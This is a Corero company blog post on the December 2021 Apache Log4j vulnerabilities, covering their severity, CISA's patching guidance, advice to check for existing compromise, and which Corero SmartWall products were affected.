Last week security researchers discovered a vulnerability in the Apache Log4j logging utility code, written in the Java language. This utility is widely used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. The discovered vulnerability can be used by attackers to install remote access tools to steal data, install cryptocurrency miners, deploy ransomware, or create botnets (which could be deployed to launch Distributed Denial of Service (DDoS) attacks). The initial vulnerability is being tracked by the National Institutes for Standards and Technology (NIST) as CVE-2021-44228. A second and third Apache Log4j vulnerabilities were later discovered and identified as CVE-2021-45046 and CVE-2021-45105. So far, security updates have been issued to patch the first two vulnerabilities.
How risky are these vulnerabilities?
With respect to the initial vulnerability, according to Data Breach Today, “It has a 10 severity rating on a scale of 1 to 10, as attackers can remotely exploit it without any input from the victim, and it requires limited technical ability to deploy.” You know a cybersecurity vulnerability is a big deal when mainstream news media reports on it; for example, MSN News reported: “The list of potential victims encompasses nearly a third of all web servers in the world, according to cybersecurity firm Cybereason. Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and one of the world’s most popular video games, Minecraft count themselves among the slew of tech and industry giants running the popular software code that U.S. officials estimate have left hundreds of millions of devices exposed.”
The US government’s Cybersecurity and Infrastructure Agency (CISA) is warning organizations to take this vulnerability seriously, and has directed all federal agencies to mitigate the vulnerability by installing patches immediately. According to CISA:
- “On December 10, 2021, Apache released Log4j version 2.15.0 in a security update to address the CVE-2021-44228 vulnerability.
- (Updated December 15, 2021) On December 13, 2021, Apache released Log4j version 2.16.0 in a security update to address the CVE-2021-45046 vulnerability. A remote attacker can exploit this second Log4j vulnerability to cause a denial-of-service (DOS) condition in certain non-default configurations.
- Note: affected organizations that have already upgraded to Log4j 2.15.0 will need to upgrade to Log4j 2.16.0 to be protected against both CVE-2021-44228 and CVE-2021-45046.”
What’s the current and potential impact?
The potential for attackers to wreak havoc with this vulnerability are exponential, because the Apache logging library is very common, and a foundation for much technology worldwide. Furthermore, some organizations that use Apache Log4j will, unfortunately, not hear about these vulnerabilities, or patch them, for some time; attackers could discover those organizations and leverage this for years to come. The damage that has so far been seen can be considered just the “tip of the iceberg.”
Here’s some advice: check for compromise
First of all, assume the worst; i.e., that there is a high probability that attackers have already infiltrated your systems. If so, note that the patch won’t remove any compromise that has already occurred. Therefore, at the same time security teams install the security patch for the Apache Log4j vulnerability, they should inspect all aspects of their networks and applications for signs of intrusion.
Does it affect Corero products?
Corero has completed a comprehensive review of all our products to determine whether any of them, and which versions, are impacted by these vulnerabilities. We found that some later versions of our SmartWall Central Management Server (CMS) are affected – all the latest details can be found on Corero’s website Security Advisories page – and Corero has already made available new versions of the CMS to remove the vulnerable Log4j library.
If you need further guidance, please contact Corero support for more information.
For over a decade, Corero has been providing state-of-the-art, highly-effective, real-time automatic DDoS protection solutions for enterprise, hosting and service provider customers around the world. Our SmartWall® DDoS mitigation solutions protect on-premise, cloud, virtual and hybrid environments. For more on Corero’s flexible deployment models, click here. If you’d like to learn more, please contact us.